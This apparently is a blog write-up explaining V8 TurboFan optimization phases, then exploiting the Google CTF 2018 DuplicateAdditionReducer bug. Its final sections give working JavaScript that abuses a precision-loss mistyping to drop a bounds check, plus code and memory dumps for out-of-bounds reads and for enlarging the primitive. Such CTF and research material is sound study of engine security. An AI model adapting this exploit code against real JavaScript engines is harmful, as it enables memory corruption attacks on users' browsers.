Just a few words on sea of nodes. TurboFan works on a program representation called a sea of nodes. Nodes can represent arithmetic operations, load, stores, calls, constants etc. There are three types of edges that we describe one by one below.

Control edges

Control edges are the same kind of edges that you find in Control Flow Graphs. They enable branches and loops.

control_draw

Value edges

Value edges are the edges you find in Data Flow Graphs. They show value dependencies.

value_draw

Effect edges

Effect edges order operations such as reading or writing states.

In a scenario like obj[x] = obj[x] + 1 you need to read the property x before writing it. As such, there is an effect edge between the load and the store. Also, you need to increment the read property before storing it. Therefore, you need an effect edge between the load and the addition. In the end, the effect chain is load -> add -> store as you can see below.

effects.png

If you would like to learn more about this you may want to check this TechTalk on TurboFan JIT design or this blog post.

Experimenting with the optimization phases

In this article we want to focus on how v8 generates optimized code using TurboFan. As mentioned just before, TurboFan works with sea of nodes and we want to understand how this graph evolves through all the optimizations. This is particularly interesting to us because some very powerful security bugs have been found in this area. Recent TurboFan vulnerabilities include incorrect typing of Math.expm1, incorrect typing of String.(last)IndexOf (that I exploited here) or incorrect operation side-effect modeling.

In order to understand what happens, you really need to read the code. Here are a few places you want to look at in the source folder :

  • src/builtin

    Where all the builtins functions such as Array#concat are implemented

  • src/runtime

    Where all the runtime functions such as %DebugPrint are implemented

  • src/interpreter/interpreter-generator.cc

    Where all the bytecode handlers are implemented

  • src/compiler

    Main repository for TurboFan!

  • src/compiler/pipeline.cc

    The glue that builds the graph, runs every phase and optimizations passes etc

  • src/compiler/opcodes.h

    Macros that defines all the opcodes used by TurboFan

  • src/compiler/typer.cc

    Implements typing via the Typer reducer

  • src/compiler/operation-typer.cc

    Implements some more typing, used by the Typer reducer

  • src/compiler/simplified-lowering.cc

    Implements simplified lowering, where some CheckBounds elimination will be done

Playing with NumberAdd

Let's consider the following function :

function opt_me() {
  let x = Math.random();
  let y = x + 2;
  return y + 3;
}

Simply execute it a lot to trigger TurboFan or manually force optimization with %OptimizeFunctionOnNextCall. Run your code with --trace-turbo to generate trace files for turbolizer.

Graph builder phase

We can look at the very first generated graph by selecting the "bytecode graph builder" option. The JSCall node corresponds to the Math.random call and obviously the NumberConstant and SpeculativeNumberAdd nodes are generated because of both x+2 and y+3 statements.

addnumber_graphbuilder

Typer phase

After graph creation comes the optimization phases, which as the name implies run various optimization passes. An optimization pass can be called during several phases.

One of its early optimization phase, is called the TyperPhase and is run by OptimizeGraph. The code is pretty self-explanatory.

// pipeline.cc
bool PipelineImpl::OptimizeGraph(Linkage* linkage) {
  PipelineData* data = this->data_;
  // Type the graph and keep the Typer running such that new nodes get
  // automatically typed when they are created.
  Run<TyperPhase>(data->CreateTyper());
// pipeline.cc
struct TyperPhase {
  void Run(PipelineData* data, Zone* temp_zone, Typer* typer) {
    // [...]
    typer->Run(roots, &induction_vars);
  }
};

When the Typer runs, it visits every node of the graph and tries to reduce them.

// typer.cc
void Typer::Run(const NodeVector& roots,
                LoopVariableOptimizer* induction_vars) {
  // [...]
  Visitor visitor(this, induction_vars);
  GraphReducer graph_reducer(zone(), graph());
  graph_reducer.AddReducer(&visitor);
  for (Node* const root : roots) graph_reducer.ReduceNode(root);
  graph_reducer.ReduceGraph();
  // [...]
}

class Typer::Visitor : public Reducer {
// ...
  Reduction Reduce(Node* node) override {
// calls visitors such as JSCallTyper
}
// typer.cc
Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
  if (!fun.IsHeapConstant() || !fun.AsHeapConstant()->Ref().IsJSFunction()) {
    return Type::NonInternal();
  }
  JSFunctionRef function = fun.AsHeapConstant()->Ref().AsJSFunction();
  if (!function.shared().HasBuiltinFunctionId()) {
    return Type::NonInternal();
  }
  switch (function.shared().builtin_function_id()) {
    case BuiltinFunctionId::kMathRandom:
      return Type::PlainNumber();

So basically, the TyperPhase is going to call JSCallTyper on every single JSCall node that it visits. If we read the code of JSCallTyper, we see that whenever the called function is a builtin, it will associate a Type with it. For instance, in the case of a call to the MathRandom builtin, it knows that the expected return type is a Type::PlainNumber.

Type Typer::Visitor::TypeNumberConstant(Node* node) {
  double number = OpParameter<double>(node->op());
  return Type::NewConstant(number, zone());
}
Type Type::NewConstant(double value, Zone* zone) {
  if (RangeType::IsInteger(value)) {
    return Range(value, value, zone);
  } else if (IsMinusZero(value)) {
    return Type::MinusZero();
  } else if (std::isnan(value)) {
    return Type::NaN();
  }

  DCHECK(OtherNumberConstantType::IsOtherNumberConstant(value));
  return OtherNumberConstant(value, zone);
}

For the NumberConstant nodes it's easy. We simply read TypeNumberConstant. In most case, the type will be Range. What about those SpeculativeNumberAdd now? We need to look at the OperationTyper.

#define SPECULATIVE_NUMBER_BINOP(Name)                         \
  Type OperationTyper::Speculative##Name(Type lhs, Type rhs) { \
    lhs = SpeculativeToNumber(lhs);                            \
    rhs = SpeculativeToNumber(rhs);                            \
    return Name(lhs, rhs);                                     \
  }
SPECULATIVE_NUMBER_BINOP(NumberAdd)
#undef SPECULATIVE_NUMBER_BINOP

Type OperationTyper::SpeculativeToNumber(Type type) {
  return ToNumber(Type::Intersect(type, Type::NumberOrOddball(), zone()));
}

They end-up being reduced by OperationTyper::NumberAdd(Type lhs, Type rhs) (the return Name(lhs,rhs) becomes return NumberAdd(lhs, rhs) after pre-processing).

To get the types of the right input node and the left input node, we call SpeculativeToNumber on both of them. To keep it simple, any kind of Type::Number will remain the same type (a PlainNumber being a Number, it will stay a PlainNumber). The Range(n,n) type will become a Number as well so that we end-up calling NumberAdd on two Number. NumberAdd mostly checks for some corner cases like if one of the two types is a MinusZero for instance. In most cases, the function will simply return the PlainNumber type.

Okay done for the Typer phase!

To sum up, everything happened in : - Typer::Visitor::JSCallTyper - OperationTyper::SpeculativeNumberAdd

And this is how types are treated : - The type of JSCall(MathRandom) becomes a PlainNumber, - The type of NumberConstant[n] with n != NaN & n != -0 becomes a Range(n,n) - The type of a Range(n,n) is PlainNumber - The type of SpeculativeNumberAdd(PlainNumber, PlainNumber) is PlainNumber

Now the graph looks like this :

addnumber_typer

Type lowering

In OptimizeGraph, the type lowering comes right after the typing.

// pipeline.cc
  Run<TyperPhase>(data->CreateTyper());
  RunPrintAndVerify(TyperPhase::phase_name());
  Run<TypedLoweringPhase>();
  RunPrintAndVerify(TypedLoweringPhase::phase_name());

This phase goes through even more reducers.

// pipeline.cc
    TypedOptimization typed_optimization(&graph_reducer, data->dependencies(),
                                         data->jsgraph(), data->broker());
// [...]
    AddReducer(data, &graph_reducer, &dead_code_elimination);
    AddReducer(data, &graph_reducer, &create_lowering);
    AddReducer(data, &graph_reducer, &constant_folding_reducer);
    AddReducer(data, &graph_reducer, &typed_lowering);
    AddReducer(data, &graph_reducer, &typed_optimization);
    AddReducer(data, &graph_reducer, &simple_reducer);
    AddReducer(data, &graph_reducer, &checkpoint_elimination);
    AddReducer(data, &graph_reducer, &common_reducer);

Let's have a look at the TypedOptimization and more specifically TypedOptimization::Reduce.

When a node is visited and its opcode is IrOpcode::kSpeculativeNumberAdd, it calls ReduceSpeculativeNumberAdd.

Reduction TypedOptimization::ReduceSpeculativeNumberAdd(Node* node) {
  Node* const lhs = NodeProperties::GetValueInput(node, 0);
  Node* const rhs = NodeProperties::GetValueInput(node, 1);
  Type const lhs_type = NodeProperties::GetType(lhs);
  Type const rhs_type = NodeProperties::GetType(rhs);
  NumberOperationHint hint = NumberOperationHintOf(node->op());
  if ((hint == NumberOperationHint::kNumber ||
       hint == NumberOperationHint::kNumberOrOddball) &&
      BothAre(lhs_type, rhs_type, Type::PlainPrimitive()) &&
      NeitherCanBe(lhs_type, rhs_type, Type::StringOrReceiver())) {
    // SpeculativeNumberAdd(x:-string, y:-string) =>
    //     NumberAdd(ToNumber(x), ToNumber(y))
    Node* const toNum_lhs = ConvertPlainPrimitiveToNumber(lhs);
    Node* const toNum_rhs = ConvertPlainPrimitiveToNumber(rhs);
    Node* const value =
        graph()->NewNode(simplified()->NumberAdd(), toNum_lhs, toNum_rhs);
    ReplaceWithValue(node, value);
    return Replace(node);
  }
  return NoChange();
}

In the case of our two nodes, both have a hint of NumberOperationHint::kNumber because their type is a PlainNumber.

Both the right and left hand side types are PlainPrimitive (PlainNumber from the NumberConstant's Range and PlainNumber from the JSCall). Therefore, a new NumberAdd node is created and replaces the SpeculativeNumberAdd.

Similarly, there is a JSTypedLowering::ReduceJSCall called when the JSTypedLowering reducer is visiting a JSCall node. Because the call target is a Code Stub Assembler implementation of a builtin function, TurboFan simply creates a LoadField node and change the opcode of the JSCall node to a Call opcode.

It also adds new inputs to this node.

Reduction JSTypedLowering::ReduceJSCall(Node* node) {
// [...]
// Check if {target} is a known JSFunction.
// [...]
    // Load the context from the {target}.
    Node* context = effect = graph()->NewNode(
        simplified()->LoadField(AccessBuilder::ForJSFunctionContext()), target,
        effect, control);
    NodeProperties::ReplaceContextInput(node, context);

    // Update the effect dependency for the {node}.
    NodeProperties::ReplaceEffectInput(node, effect);
// [...]
// kMathRandom is a CSA builtin, not a CPP one
// builtins-math-gen.cc:TF_BUILTIN(MathRandom, CodeStubAssembler) 
// builtins-definitions.h:  TFJ(MathRandom, 0, kReceiver)  
    } else if (shared.HasBuiltinId() &&
               Builtins::HasCppImplementation(shared.builtin_id())) {
      // Patch {node} to a direct CEntry call.
      ReduceBuiltin(jsgraph(), node, shared.builtin_id(), arity, flags);
    } else if (shared.HasBuiltinId() &&
               Builtins::KindOf(shared.builtin_id()) == Builtins::TFJ) {
      // Patch {node} to a direct code object call.
      Callable callable = Builtins::CallableFor(
          isolate(), static_cast<Builtins::Name>(shared.builtin_id()));
      CallDescriptor::Flags flags = CallDescriptor::kNeedsFrameState;

      const CallInterfaceDescriptor& descriptor = callable.descriptor();
      auto call_descriptor = Linkage::GetStubCallDescriptor(
          graph()->zone(), descriptor, 1 + arity, flags);
      Node* stub_code = jsgraph()->HeapConstant(callable.code());
      node->InsertInput(graph()->zone(), 0, stub_code);  // Code object.
      node->InsertInput(graph()->zone(), 2, new_target);
      node->InsertInput(graph()->zone(), 3, argument_count);
      NodeProperties::ChangeOp(node, common()->Call(call_descriptor));
    }
 // [...]
    return Changed(node);
  }

Let's quickly check the sea of nodes to indeed observe the addition of the LoadField and the change of opcode of the node #25 (note that it is the same node as before, only the opcode changed).

addnumber_jscall_new_loadfield

Range types

Previously, we encountered various types including the Range type. However, it was always the case of Range(n,n) of size 1.

Now let's consider the following code :

function opt_me(b) {
  let x = 10; // [1] x0 = 10
  if (b == "foo")
    x = 5; // [2] x1 = 5
  // [3] x2 = phi(x0, x1)
  let y = x + 2;
  y = y + 1000; 
  y = y * 2;
  return y;
}

So depending on b == "foo" being true or false, x will be either 10 or 5. In SSA form, each variable can be assigned only once. So x0 and x1 will be created for 10 and 5 at lines [1] and [2]. At line [3], the value of x (x2 in SSA) will be either x0 or x1, hence the need of a phi function. The statement x2 = phi(x0,x1) means that x2 can take the value of either x0 or x1.

So what about types now? The type of the constant 10 (x0) is Range(10,10) and the range of constant 5 (x1) is Range(5,5). Without surprise, the type of the phi node is the union of the two ranges which is Range(5,10).

Let's quickly draw a CFG graph in SSA form with typing.

diagram

Okay, let's actually check this by reading the code.

Type Typer::Visitor::TypePhi(Node* node) {
  int arity = node->op()->ValueInputCount();
  Type type = Operand(node, 0);
  for (int i = 1; i < arity; ++i) {
    type = Type::Union(type, Operand(node, i), zone());
  }
  return type;
}

The code looks exactly as we would expect it to be: simply the union of all of the input types!

To understand the typing of the SpeculativeSafeIntegerAdd nodes, we need to go back to the OperationTyper implementation. In the case of SpeculativeSafeIntegerAdd(n,m), TurboFan does an AddRange(n.Min(), n.Max(), m.Min(), m.Max()).

Type OperationTyper::SpeculativeSafeIntegerAdd(Type lhs, Type rhs) {
  Type result = SpeculativeNumberAdd(lhs, rhs);
  // If we have a Smi or Int32 feedback, the representation selection will
  // either truncate or it will check the inputs (i.e., deopt if not int32).
  // In either case the result will be in the safe integer range, so we
  // can bake in the type here. This needs to be in sync with
  // SimplifiedLowering::VisitSpeculativeAdditiveOp.
  return Type::Intersect(result, cache_->kSafeIntegerOrMinusZero, zone());
}
Type OperationTyper::NumberAdd(Type lhs, Type rhs) {
// [...]
  Type type = Type::None();
  lhs = Type::Intersect(lhs, Type::PlainNumber(), zone());
  rhs = Type::Intersect(rhs, Type::PlainNumber(), zone());
  if (!lhs.IsNone() && !rhs.IsNone()) {
    if (lhs.Is(cache_->kInteger) && rhs.Is(cache_->kInteger)) {
      type = AddRanger(lhs.Min(), lhs.Max(), rhs.Min(), rhs.Max());
    } 
// [...]
  return type;
}

AddRanger is the function that actually computes the min and max bounds of the Range.

Type OperationTyper::AddRanger(double lhs_min, double lhs_max, double rhs_min,
                               double rhs_max) {
  double results[4];
  results[0] = lhs_min + rhs_min;
  results[1] = lhs_min + rhs_max;
  results[2] = lhs_max + rhs_min;
  results[3] = lhs_max + rhs_max;
  // Since none of the inputs can be -0, the result cannot be -0 either.
  // However, it can be nan (the sum of two infinities of opposite sign).
  // On the other hand, if none of the "results" above is nan, then the
  // actual result cannot be nan either.
  int nans = 0;
  for (int i = 0; i < 4; ++i) {
    if (std::isnan(results[i])) ++nans;
  }
  if (nans == 4) return Type::NaN();
  Type type = Type::Range(array_min(results, 4), array_max(results, 4), zone());
  if (nans > 0) type = Type::Union(type, Type::NaN(), zone());
  // Examples:
  //   [-inf, -inf] + [+inf, +inf] = NaN
  //   [-inf, -inf] + [n, +inf] = [-inf, -inf] \/ NaN
  //   [-inf, +inf] + [n, +inf] = [-inf, +inf] \/ NaN
  //   [-inf, m] + [n, +inf] = [-inf, +inf] \/ NaN
  return type;
}

Done with the range analysis!

graph

CheckBounds nodes

Our final experiment deals with CheckBounds nodes. Basically, nodes with a CheckBounds opcode add bound checks before loads and stores.

Consider the following code :

function opt_me(b) {
  let values = [42,1337];       // HeapConstant <FixedArray[2]>
  let x = 10;                   // NumberConstant[10]          | Range(10,10)
  if (b == "foo")
    x = 5;                      // NumberConstant[5]           | Range(5,5)
                                // Phi                         | Range(5,10)
  let y = x + 2;                // SpeculativeSafeIntegerAdd   | Range(7,12)
  y = y + 1000;                 // SpeculativeSafeIntegerAdd   | Range(1007,1012)
  y = y * 2;                    // SpeculativeNumberMultiply   | Range(2014,2024)
  y = y & 10;                   // SpeculativeNumberBitwiseAnd | Range(0,10)
  y = y / 3;                    // SpeculativeNumberDivide     | PlainNumber[r][s][t]
  y = y & 1;                    // SpeculativeNumberBitwiseAnd | Range(0,1)
  return values[y];             // CheckBounds                 | Range(0,1)
}

In order to prevent values[y] from using an out of bounds index, a CheckBounds node is generated. Here is what the sea of nodes graph looks like right after the escape analysis phase.

before

The cautious reader probably noticed something interesting about the range analysis. The type of the CheckBounds node is Range(0,1)! And also, the LoadElement has an input FixedArray HeapConstant of length 2. That leads us to an interesting phase: the simplified lowering.

Simplified lowering

When visiting a node with a IrOpcode::kCheckBounds opcode, the function VisitCheckBounds is going to get called.

And this function, is responsible for CheckBounds elimination which sounds interesting!

Long story short, it compares inputs 0 (index) and 1 (length). If the index's minimum range value is greater than zero (or equal to) and its maximum range value is less than the length value, it triggers a DeferReplacement which means that the CheckBounds node eventually will be removed!

 void VisitCheckBounds(Node* node, SimplifiedLowering* lowering) {
    CheckParameters const& p = CheckParametersOf(node->op());
    Type const index_type = TypeOf(node->InputAt(0));
    Type const length_type = TypeOf(node->InputAt(1));
    if (length_type.Is(Type::Unsigned31())) {
      if (index_type.Is(Type::Integral32OrMinusZero())) {
        // Map -0 to 0, and the values in the [-2^31,-1] range to the
        // [2^31,2^32-1] range, which will be considered out-of-bounds
        // as well, because the {length_type} is limited to Unsigned31.
        VisitBinop(node, UseInfo::TruncatingWord32(),
                   MachineRepresentation::kWord32);
        if (lower()) {
          if (lowering->poisoning_level_ ==
                  PoisoningMitigationLevel::kDontPoison &&
              (index_type.IsNone() || length_type.IsNone() ||
               (index_type.Min() >= 0.0 &&
                index_type.Max() < length_type.Min()))) {
            // The bounds check is redundant if we already know that
            // the index is within the bounds of [0.0, length[.
            DeferReplacement(node, node->InputAt(0));
          } else {
            NodeProperties::ChangeOp(
                node, simplified()->CheckedUint32Bounds(p.feedback()));
          }
        }
// [...]
  }

Once again, let's confirm that by playing with the graph. We want to look at the CheckBounds before the simplified lowering and observe its inputs.

CheckBounds_Index_Length

We can easily see that Range(0,1).Max() < 2 and Range(0,1).Min() >= 0. Therefore, node 58 is going to be replaced as proven useless by the optimization passes analysis.

After simplified lowering, the graph looks like this :

after

Playing with various addition opcodes

If you look at the file stopcode.h we can see various types of opcodes that correspond to some kind of add primitive.

V(JSAdd)
V(NumberAdd)
V(SpeculativeNumberAdd)
V(SpeculativeSafeIntegerAdd)
V(Int32Add)
// many more [...]

So, without going into too much details we're going to do one more experiment. Let's make small snippets of code that generate each one of these opcodes. For each one, we want to confirm we've got the expected opcode in the sea of node.

SpeculativeSafeIntegerAdd

let opt_me = (x) => {
  return x + 1;
}

for (var i = 0; i < 0x10000; ++i)
  opt_me(i);
%DebugPrint(opt_me);
%SystemBreak();

In this case, TurboFan speculates that x will be an integer. This guess is made due to the type feedback we mentioned earlier.

Indeed, before kicking out TurboFan, v8 first quickly generates ignition bytecode that gathers type feedback.

$ d8 speculative_safeintegeradd.js --allow-natives-syntax --print-bytecode --print-bytecode-filter opt_me
[generated bytecode for function: opt_me]
Parameter count 2
Frame size 0
   13 E> 0xceb2389dc72 @    0 : a5                StackCheck 
   24 S> 0xceb2389dc73 @    1 : 25 02             Ldar a0
   33 E> 0xceb2389dc75 @    3 : 40 01 00          AddSmi [1], [0]
   37 S> 0xceb2389dc78 @    6 : a9                Return 
Constant pool (size = 0)
Handler Table (size = 0)

The x + 1 statement is represented by the AddSmi ignition opcode.

If you want to know more, Franziska Hinkelmann wrote a blog post about ignition bytecode.

Let's read the code to quickly understand the semantics.

// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

This code means that everytime this ignition opcode is executed, it will gather type feedback to to enable TurboFan’s speculative optimizations.

We can examine the type feedback vector (which is the structure containing the profiling data) of a function by using %DebugPrint or the job gdb command on a tagged pointer to a FeedbackVector.

DebugPrint: 0x129ab460af59: [Function]
// [...]
 - feedback vector: 0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// [...]
gef➤  job 0x1a5d13f1dd91
0x1a5d13f1dd91: [FeedbackVector] in OldSpace
// ...
 - slot #0 BinaryOp BinaryOp:SignedSmall { // actual type feedback
     [0]: 1
  }

Thanks to this profiling, TurboFan knows it can generate a SpeculativeSafeIntegerAdd. This is exactly the reason why it is called speculative optimization (TurboFan makes guesses, assumptions, based on this profiling). However, once optimized, if opt_me is called with a completely different parameter type, there would be a deoptimization.

graph

SpeculativeNumberAdd

let opt_me = (x) => {
  return x + 1000000000000;
}
opt_me(42);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(4242);

If we modify a bit the previous code snippet and use a higher value that can't be represented by a small integer (Smi), we'll get a SpeculativeNumberAdd instead. TurboFan speculates about the type of x and relies on type feedback.

graph

Int32Add

let opt_me= (x) => {
  let y = x ? 10 : 20;
  return y + 100;
}
opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

At first, the addition y + 100 relies on speculation. Thus, the opcode SpeculativeSafeIntegerAdd is being used. However, during the simplified lowering phase, TurboFan understands that y + 100 is always going to be an addition between two small 32 bits integers, thus lowering the node to a Int32Add.

  • Before

    graph
  • After

    graph

JSAdd

let opt_me = (x) => {
  let y = x ? 
    ({valueOf() { return 10; }})
    :
    ({[Symbol.toPrimitive]() { return 20; }});
  return y + 1;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

In this case, y is a complex object and we need to call a slow JSAdd opcode to deal with this kind of situation.

graph

NumberAdd

let opt_me = (x) => {
  let y = x ? 10 : 20;
  return y + 1000000000000;
}

opt_me(true);
%OptimizeFunctionOnNextCall(opt_me);
opt_me(false);

Like for the SpeculativeNumberAdd example, we add a value that can't be represented by an integer. However, this time there is no speculation involved. There is no need for any kind of type feedback since we can guarantee that y is an integer. There is no way to make y anything other than an integer.

graph

The DuplicateAdditionReducer challenge

The DuplicateAdditionReducer written by Stephen Röttger for Google CTF 2018 is a nice TurboFan challenge that adds a new reducer optimizing cases like x + 1 + 1.

Understanding the reduction

Let’s read the relevant part of the code.

Reduction DuplicateAdditionReducer::Reduce(Node* node) {
  switch (node->opcode()) {
    case IrOpcode::kNumberAdd:
      return ReduceAddition(node);
    default:
      return NoChange();
  }
}

Reduction DuplicateAdditionReducer::ReduceAddition(Node* node) {
  DCHECK_EQ(node->op()->ControlInputCount(), 0);
  DCHECK_EQ(node->op()->EffectInputCount(), 0);
  DCHECK_EQ(node->op()->ValueInputCount(), 2);

  Node* left = NodeProperties::GetValueInput(node, 0);
  if (left->opcode() != node->opcode()) {
    return NoChange(); // [1]
  }

  Node* right = NodeProperties::GetValueInput(node, 1);
  if (right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [2]
  }

  Node* parent_left = NodeProperties::GetValueInput(left, 0);
  Node* parent_right = NodeProperties::GetValueInput(left, 1);
  if (parent_right->opcode() != IrOpcode::kNumberConstant) {
    return NoChange(); // [3]
  }

  double const1 = OpParameter<double>(right->op());
  double const2 = OpParameter<double>(parent_right->op());

  Node* new_const = graph()->NewNode(common()->NumberConstant(const1+const2));

  NodeProperties::ReplaceValueInput(node, parent_left, 0);
  NodeProperties::ReplaceValueInput(node, new_const, 1);
  return Changed(node); // [4]
}

Basically that means we've got 4 different code paths (read the code comments) when reducing a NumberAdd node. Only one of them leads to a node change. Let's draw a schema representing all of those cases. Nodes in red to indicate they don't satisfy a condition, leading to a return NoChange.

schema_vuln_ctf

The case [4] will take both NumberConstant's double value and add them together. It will create a new NumberConstant node with a value that is the result of this addition.

The node's right input will become the newly created NumberConstant while the left input will be replaced by the left parent's left input.

node_replace

Understanding the bug

Precision loss with IEEE-754 doubles

V8 represents numbers using IEEE-754 doubles. That means it can encode integers using 52 bits. Therefore the maximum value is pow(2,53)-1 which is 9007199254740991.

Number above this value can't all be represented. As such, there will be precision loss when computing with values greater than that.

wikipedia

A quick experiment in JavaScript can demonstrate this problem where we can get to strange behaviors.

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x
9007199254740992
d8> x + 1
9007199254740992
d8> 9007199254740993 == 9007199254740992
true
d8> x + 2
9007199254740994
d8> x + 3
9007199254740996
d8> x + 4 
9007199254740996
d8> x + 5
9007199254740996
d8> x + 6
9007199254740998

Let's try to better understand this. 64 bits IEEE 754 doubles are represented using a 1-bit sign, 11-bit exponent and a 52-bit mantissa. When using the normalized form (exponent is non null), to compute the value, simply follow the following formula.

value = (-1)^sign * 2^(e) * fraction
e = 2^(exponent - bias)
bias = 1024 (for 64 bits doubles)
fraction = bit52*2^-0 + bit51*2^-1 + .... bit0*2^52

So let's go through a few computation ourselves.

d8> %DumpObjects(Number.MAX_SAFE_INTEGER, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0ddd0    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0ddd8    0x433fffffffffffff    

d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 1, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0aec0    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0aec8    0x4340000000000000    

d8> %DumpObjects(Number.MAX_SAFE_INTEGER + 2, 10)
----- [ HEAP_NUMBER_TYPE : 0x10 ] -----
0x00000b8fffc0de88    0x00001f5c50100559    MAP_TYPE    
0x00000b8fffc0de90    0x4340000000000001  

exponent_mantissa
exponent_e
mantissa_fraction

For each number, we'll have the following computation.

sage_computations

You can try the computations using links 1, 2 and 3.

As you see, the precision loss is inherent to the way IEEE-754 computations are made. Even though we incremented the binary value, the corresponding real number was not incremented accordingly. It is impossible to represent the value 9007199254740993 using IEEE-754 doubles. That's why it is not possible to increment 9007199254740992. You can however add 2 to 9007199254740992 because the result can be represented!

That means that x += 1; x += 1; may not be equivalent to x += 2. And that might be an interesting behaviour to exploit.

d8> var x = Number.MAX_SAFE_INTEGER + 1
9007199254740992
d8> x + 1 + 1
9007199254740992
d8> x + 2
9007199254740994

Therefore, those two graphs are not equivalent.

bad_computation

Furthermore, the reducer does not update the type of the changed node. That's why it is going to be 'incorrectly' typed with the old Range(9007199254740992,9007199254740992), from the previous Typer phase, instead of Range(9007199254740994,9007199254740994) (even though the problem is that really, we cannot take for granted that there is no precision loss while computing m+n and therefore x += n; x += n; may not be equivalent to x += (n + n)).

There is going to be a mismatch between the addition result 9007199254740994 and the range type with maximum value of 9007199254740992. What if we can use this buggy range analysis to get to reduce a CheckBounds node during the simplified lowering phase in a way that it would remove it?

It is actually possible to trick the CheckBounds simplified lowering visitor into comparing an incorrect index Range to the length so that it believes that the index is in bounds when in reality it is not. Thus removing what seemed to be a useless bound check.

Let's check this by having yet another look at the sea of nodes!

First consider the following code.

let opt_me = (x) => {
  let arr = new Array(1.1,1.2,1.3,1.4);
  arr2 = new Array(42.1,42.0,42.0);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // maximum value : 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1; // 9007199254740992 + 1 + 1 = 9007199254740992 + 1 = 9007199254740992
  // replaced by 9007199254740992+2=9007199254740994 because of the incorrect reduction
  z = z - (4503599627370495*2); // max = 2 vs actual max = 4
  return arr[z];
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");
print(res);

We do get a graph that looks exactly like the problematic drawing we showed before. Instead of getting two NumberAdd(x,1), we get only one with NumberAdd(x,2), which is not equivalent.

vuln_numberadd

The maximum value of z will be the following :

d8> var x = 9007199254740992
d8> x = x + 2 // because of the buggy reducer!
9007199254740994
d8> x = x - (4503599627370495*2)
4

However, the index range used when visiting CheckBounds during simplified lowering will be computed as follows :

d8> var x = 9007199254740992
d8> x = x  + 1
9007199254740992
d8> x = x  + 1
9007199254740992
d8> x = x - (4503599627370495*2)
2

Confirm that by looking at the graph.

bad_range_for_checkbounds

The index type used by CheckBounds is Range(0,2)(but in reality, its value can be up to 4) whereas the length type is Range(4,4). Therefore, the index looks to be always in bounds, making the CheckBounds disappear. In this case, we can load/store 8 or 16 bytes further (length is 4, we read at index 4. You could also have an array of length 3 and read at index 3 or 4.).

Actually, if we execute the script, we get some OOB access and leak memory!

$ d8 trigger.js --allow-natives-syntax
3.0046854007112e-310

Exploitation

Now that we understand the bug, we may want to improve our primitive. For instance, it would be interesting to get the ability to read and write more memory.

Improving the primitive

One thing to try is to find a value such that the difference between x + n + n and x + m (with m = n + n and x = Number.MAX_SAFE_INTEGER + 1) is big enough.

For instance, replacing x + 007199254740989 + 9007199254740966 by x + 9014398509481956 gives us an out of bounds by 4 and not 2 anymore.

d8> sum = 007199254740989 + 9007199254740966
x + 9014398509481956
d8> a = x + sum
18021597764222948
d8> b = x + 007199254740989 + 9007199254740966
18021597764222944
d8> a - b
4

And what if we do multiple additions to get even more precision loss? Like x + n + n + n + n to be transformed as x + 4n?

d8> var sum = 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
undefined
d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> x + sum
27035996273704904
d8> x + 007199254740989 + 9007199254740966 + 007199254740989 + 9007199254740966
27035996273704896
d8> 27035996273704904 - 27035996273704896
8

Now we get a delta of 8.

Or maybe we could amplify even more the precision loss using other operators?

d8> var x = Number.MAX_SAFE_INTEGER + 1
undefined
d8> 10 * (x + 1 + 1)
90071992547409920
d8> 10 * (x + 2) 
90071992547409940

That gives us a delta of 20 because precision_loss * 10 = 20 and the precision loss is of 2.

Step 0 : Corrupting a FixedDoubleArray

First, we want to observe the memory layout to know what we are leaking and what we want to overwrite exactly. For that, I simply use my custom %DumpObjects v8 runtime function. Also, I use an ArrayBuffer with two views: one Float64Array and one BigUint64Array to easily convert between 64 bits floats and 64 bits integers.

let ab = new ArrayBuffer(8);
let fv = new Float64Array(ab);
let dv = new BigUint64Array(ab);

let f2i = (f) => {
  fv[0] = f;
  return dv[0];
}

let hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let debug = (x,z, leak) => {
  print("oob index is " + z);
  print("length is " + x.length);
  print("leaked 0x" + hexprintablei(f2i(leak)));
  %DumpObjects(x,13); // 23 & 3 to dump the jsarray's elements
};

let opt_me = (x) => {
  let arr = new Array(1.1,1.2,1.3);
  arr2 = new Array(42.1,42.0,42.0);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1;
  z = z - (4503599627370495*2); 
  let leak = arr[z];
  if (x == "foo")
    debug(arr,z, leak);
  return leak;
}

opt_me("");
%OptimizeFunctionOnNextCall(opt_me);
let res = opt_me("foo");

That gives the following results :

oob index is 4
length is 3
leaked 0x0000000300000000
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6a8    0x00002af7fe681451    MAP_TYPE    
0x00002e5fddf8b6b0    0x0000000300000000    
0x00002e5fddf8b6b8    0x3ff199999999999a    arr[0]
0x00002e5fddf8b6c0    0x3ff3333333333333    arr[1]
0x00002e5fddf8b6c8    0x3ff4cccccccccccd    arr[2]
----- [ FIXED_DOUBLE_ARRAY_TYPE : 0x28 ] -----
0x00002e5fddf8b6d0    0x00002af7fe681451    MAP_TYPE // also arr[3]
0x00002e5fddf8b6d8    0x0000000300000000    arr[4] with OOB index!
0x00002e5fddf8b6e0    0x40450ccccccccccd    arr2[0] == 42.1
